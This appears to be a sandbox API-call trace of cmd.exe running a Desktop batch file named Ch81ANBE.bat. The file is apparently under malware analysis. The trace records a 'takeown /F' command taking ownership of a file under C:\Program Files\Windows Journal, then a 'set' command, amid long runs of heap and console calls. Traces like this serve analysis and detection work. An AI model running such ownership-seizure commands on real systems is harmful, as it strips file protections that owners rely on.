[0155.491] GetProcessHeap () returned 0x440000 [0155.491] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456648 | out: hHeap=0x440000) returned 1 [0155.491] GetProcessHeap () returned 0x440000 [0155.491] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456430 | out: hHeap=0x440000) returned 1 [0155.491] GetProcessHeap () returned 0x440000 [0155.491] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4563b0 | out: hHeap=0x440000) returned 1 [0155.491] GetProcessHeap () returned 0x440000 [0155.491] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456280 | out: hHeap=0x440000) returned 1 [0155.491] GetProcessHeap () returned 0x440000 [0155.491] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456158 | out: hHeap=0x440000) returned 1 [0155.491] GetProcessHeap () returned 0x440000 [0155.491] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4560f0 | out: hHeap=0x440000) returned 1 [0155.491] GetProcessHeap () returned 0x440000 [0155.491] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4411c0 | out: hHeap=0x440000) returned 1 [0155.491] GetProcessHeap () returned 0x440000 [0155.491] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4411a0 | out: hHeap=0x440000) returned 1 [0155.491] GetProcessHeap () returned 0x440000 [0155.491] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x441140 | out: hHeap=0x440000) returned 1 [0155.491] _get_osfhandle (_FileHandle=3) returned 0x74 [0155.491] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0155.491] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3aef48, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3aef48*=0xc2, lpOverlapped=0x0) returned 1 [0155.492] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0155.492] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0155.493] _get_osfhandle (_FileHandle=3) returned 0x74 [0155.493] GetFileType (hFile=0x74) returned 0x1 [0155.493] _get_osfhandle (_FileHandle=3) returned 0x74 [0155.493] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0155.493] GetProcessHeap () returned 0x440000 [0155.493] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400a) returned 0x464aa8 [0155.494] GetProcessHeap () returned 0x440000 [0155.494] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x464aa8 | out: hHeap=0x440000) returned 1 [0155.497] _tell (_FileHandle=3) returned 47 [0155.497] _close (_FileHandle=3) returned 0 [0155.498] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3aed1c | out: _Buffer="\r\n") returned 2 [0155.498] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.498] GetFileType (hFile=0x7) returned 0x2 [0155.498] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0155.499] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aecdc | out: lpMode=0x3aecdc) returned 1 [0155.499] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.499] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3aed08, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aed08*=0x2) returned 1 [0155.503] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0155.503] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0155.503] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3aed18 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0155.503] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3aed18 | out: _Buffer=">") returned 1 [0155.504] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.504] GetFileType (hFile=0x7) returned 0x2 [0155.504] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0155.504] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aece0 | out: lpMode=0x3aece0) returned 1 [0155.504] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.504] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3aed0c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x3aed0c*=0x26) returned 1 [0155.505] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.505] GetFileType (hFile=0x7) returned 0x2 [0155.505] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0155.505] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef64 | out: lpMode=0x3aef64) returned 1 [0155.506] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.506] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4412a8*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x3aef90, lpReserved=0x0 | out: lpBuffer=0x4412a8*, lpNumberOfCharsWritten=0x3aef90*=0x7) returned 1 [0155.506] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3aef9c | out: _Buffer=" /F \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\" ") returned 59 [0155.506] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.506] GetFileType (hFile=0x7) returned 0x2 [0155.506] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0155.506] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef5c | out: lpMode=0x3aef5c) returned 1 [0155.507] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.507] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3b, lpNumberOfCharsWritten=0x3aef88, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aef88*=0x3b) returned 1 [0155.509] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3aefbc | out: _Buffer="\r\n") returned 2 [0155.509] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.509] GetFileType (hFile=0x7) returned 0x2 [0155.509] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0155.509] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef7c | out: lpMode=0x3aef7c) returned 1 [0155.510] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.510] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3aefa8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aefa8*=0x2) returned 1 [0155.511] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0155.511] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0155.511] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0155.511] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0155.512] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0155.512] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0155.512] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0155.512] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0155.512] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0155.512] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0155.512] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0155.512] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0155.512] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0155.512] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0155.512] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0155.512] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0155.512] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0155.512] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0155.512] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0155.512] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0155.512] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0155.513] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0155.513] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0155.513] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0155.513] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0155.513] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0155.513] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0155.513] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0155.513] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0155.513] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0155.513] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0155.513] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0155.513] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0155.513] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0155.513] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0155.513] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0155.513] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0155.513] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0155.513] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0155.514] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0155.514] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0155.514] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0155.515] GetConsoleTitleW (in: lpConsoleTitle=0x3aeb2c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0155.516] GetConsoleTitleW (in: lpConsoleTitle=0x3ae8c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0155.516] InitializeProcThreadAttributeList (in: lpAttributeList=0x3ae748, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3ae810 | out: lpAttributeList=0x3ae748, lpSize=0x3ae810) returned 1 [0155.516] UpdateProcThreadAttribute (in: lpAttributeList=0x3ae748, dwFlags=0x0, Attribute=0x60001, lpValue=0x3ae808, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3ae748, lpPreviousValue=0x0) returned 1 [0155.516] GetStartupInfoW (in: lpStartupInfo=0x3ae704 | out: lpStartupInfo=0x3ae704*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0155.893] CloseHandle (hObject=0x74) returned 1 [0155.893] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0155.893] GetProcessHeap () returned 0x440000 [0155.893] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458a98 | out: hHeap=0x440000) returned 1 [0155.893] GetEnvironmentStringsW () returned 0x457f30* [0155.893] GetProcessHeap () returned 0x440000 [0155.893] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb5c) returned 0x458a98 [0155.894] FreeEnvironmentStringsW (penv=0x457f30) returned 1 [0155.894] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0163.021] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3ae6e4 | out: lpExitCode=0x3ae6e4*=0x0) returned 1 [0163.023] CloseHandle (hObject=0x78) returned 1 [0163.023] _vsnwprintf (in: _Buffer=0x3ae82c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3ae6f0 | out: _Buffer="00000000") returned 8 [0163.024] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0163.024] GetProcessHeap () returned 0x440000 [0163.024] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458a98 | out: hHeap=0x440000) returned 1 [0163.024] GetEnvironmentStringsW () returned 0x457f30* [0163.024] GetProcessHeap () returned 0x440000 [0163.024] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb5c) returned 0x458a98 [0163.024] FreeEnvironmentStringsW (penv=0x457f30) returned 1 [0163.024] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0163.024] GetProcessHeap () returned 0x440000 [0163.024] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458a98 | out: hHeap=0x440000) returned 1 [0163.024] GetEnvironmentStringsW () returned 0x457f30* [0163.024] GetProcessHeap () returned 0x440000 [0163.024] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb5c) returned 0x458a98 [0163.024] FreeEnvironmentStringsW (penv=0x457f30) returned 1 [0163.024] GetProcessHeap () returned 0x440000 [0163.024] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x440d38 | out: hHeap=0x440000) returned 1 [0163.024] DeleteProcThreadAttributeList (in: lpAttributeList=0x3ae748 | out: lpAttributeList=0x3ae748) [0163.024] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.024] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0163.025] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.025] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0163.025] _get_osfhandle (_FileHandle=0) returned 0x3 [0163.026] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0163.026] SetConsoleInputExeNameW () returned 0x1 [0163.026] GetConsoleOutputCP () returned 0x1b5 [0163.026] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0163.026] SetThreadUILanguage (LangId=0x0) returned 0x409 [0163.027] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3aef64, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0163.027] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0163.027] _get_osfhandle (_FileHandle=3) returned 0x78 [0163.027] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0163.028] GetProcessHeap () returned 0x440000 [0163.028] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456940 | out: hHeap=0x440000) returned 1 [0163.028] GetProcessHeap () returned 0x440000 [0163.028] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456810 | out: hHeap=0x440000) returned 1 [0163.028] GetProcessHeap () returned 0x440000 [0163.028] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4566e8 | out: hHeap=0x440000) returned 1 [0163.028] GetProcessHeap () returned 0x440000 [0163.028] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x454280 | out: hHeap=0x440000) returned 1 [0163.028] GetProcessHeap () returned 0x440000 [0163.028] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456650 | out: hHeap=0x440000) returned 1 [0163.028] GetProcessHeap () returned 0x440000 [0163.028] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456438 | out: hHeap=0x440000) returned 1 [0163.028] GetProcessHeap () returned 0x440000 [0163.028] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4563b8 | out: hHeap=0x440000) returned 1 [0163.028] GetProcessHeap () returned 0x440000 [0163.028] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456288 | out: hHeap=0x440000) returned 1 [0163.028] GetProcessHeap () returned 0x440000 [0163.028] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456160 | out: hHeap=0x440000) returned 1 [0163.028] GetProcessHeap () returned 0x440000 [0163.028] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4560f0 | out: hHeap=0x440000) returned 1 [0163.028] GetProcessHeap () returned 0x440000 [0163.028] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4411a0 | out: hHeap=0x440000) returned 1 [0163.028] GetProcessHeap () returned 0x440000 [0163.028] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4412a0 | out: hHeap=0x440000) returned 1 [0163.029] GetProcessHeap () returned 0x440000 [0163.029] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x441140 | out: hHeap=0x440000) returned 1 [0163.029] _get_osfhandle (_FileHandle=3) returned 0x78 [0163.029] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0163.029] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3aef48, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3aef48*=0xb3, lpOverlapped=0x0) returned 1 [0163.029] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0163.029] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0163.030] _get_osfhandle (_FileHandle=3) returned 0x78 [0163.030] GetFileType (hFile=0x78) returned 0x1 [0163.030] _get_osfhandle (_FileHandle=3) returned 0x78 [0163.030] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0163.030] GetProcessHeap () returned 0x440000 [0163.030] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400a) returned 0x464aa8 [0163.031] GetProcessHeap () returned 0x440000 [0163.031] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x74) returned 0x4510e0 [0163.031] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\blank.jtp", nBufferLength=0x208, lpBuffer=0x3ae6d8, lpFilePart=0x3ae6d0 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\blank.jtp", lpFilePart=0x3ae6d0*="blank.jtp") returned 0x34 [0163.031] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x3ae3ec | out: lpFindFileData=0x3ae3ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41dc500, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x41dc500, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x4576e8 [0163.031] FindClose (in: hFindFile=0x4576e8 | out: hFindFile=0x4576e8) returned 1 [0163.031] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0163.032] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal", lpFindFileData=0x3ae3ec | out: lpFindFileData=0x3ae3ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xdae682e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdae682e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 0x4576e8 [0163.032] FindClose (in: hFindFile=0x4576e8 | out: hFindFile=0x4576e8) returned 1 [0163.032] _wcsnicmp (_String1="WI0FCF~1", _String2="Windows Journal", _MaxCount=0xf) returned -62 [0163.032] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates", lpFindFileData=0x3ae3ec | out: lpFindFileData=0x3ae3ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e472dd2, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e4e551f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0x4576e8 [0163.032] FindClose (in: hFindFile=0x4576e8 | out: hFindFile=0x4576e8) returned 1 [0163.032] _wcsnicmp (_String1="TEMPLA~1", _String2="Templates", _MaxCount=0x9) returned 10 [0163.032] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\blank.jtp", lpFindFileData=0x3ae3ec | out: lpFindFileData=0x3ae3ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5570eaa, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5570eaa, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x46a6d3e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x155e, dwReserved0=0x0, dwReserved1=0x0, cFileName="blank.jtp", cAlternateFileName="")) returned 0x4576e8 [0163.032] FindClose (in: hFindFile=0x4576e8 | out: hFindFile=0x4576e8) returned 1 [0163.033] GetProcessHeap () returned 0x440000 [0163.033] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1c) returned 0x4577e8 [0163.033] GetProcessHeap () returned 0x440000 [0163.033] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x464aa8 | out: hHeap=0x440000) returned 1 [0163.035] _tell (_FileHandle=3) returned 63 [0163.035] _close (_FileHandle=3) returned 0 [0163.035] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3aed1c | out: _Buffer="\r\n") returned 2 [0163.035] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.035] GetFileType (hFile=0x7) returned 0x2 [0163.036] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.036] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aecdc | out: lpMode=0x3aecdc) returned 1 [0163.036] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.036] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3aed08, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aed08*=0x2) returned 1 [0163.038] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0163.038] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0163.038] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3aed18 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0163.039] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3aed18 | out: _Buffer=">") returned 1 [0163.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.039] GetFileType (hFile=0x7) returned 0x2 [0163.039] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.039] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aece0 | out: lpMode=0x3aece0) returned 1 [0163.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.040] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3aed0c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x3aed0c*=0x26) returned 1 [0163.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.040] GetFileType (hFile=0x7) returned 0x2 [0163.041] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.041] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef64 | out: lpMode=0x3aef64) returned 1 [0163.041] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.041] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x440d40*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3aef90, lpReserved=0x0 | out: lpBuffer=0x440d40*, lpNumberOfCharsWritten=0x3aef90*=0x3) returned 1 [0163.041] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3aef9c | out: _Buffer=" FN=\"blank.jtp\" ") returned 16 [0163.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.042] GetFileType (hFile=0x7) returned 0x2 [0163.042] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.042] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef5c | out: lpMode=0x3aef5c) returned 1 [0163.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.042] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x3aef88, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aef88*=0x10) returned 1 [0163.043] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3aefbc | out: _Buffer="\r\n") returned 2 [0163.043] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.043] GetFileType (hFile=0x7) returned 0x2 [0163.044] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.044] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef7c | out: lpMode=0x3aef7c) returned 1 [0163.044] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.044] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3aefa8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aefa8*=0x2) returned 1 [0163.046] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0163.046] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0163.046] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0163.046] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0163.046] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0163.046] _wcsicmp (_String1="set", _String2="CD") returned 16 [0163.046] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0163.046] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0163.046] _wcsicmp (_String1="set", _String2="REN") returned 1 [0163.047] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0163.047] _wcsicmp (_String1="set", _String2="SET") returned 0 [0163.047] GetConsoleTitleW (in: lpConsoleTitle=0x3aeb2c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0163.047] 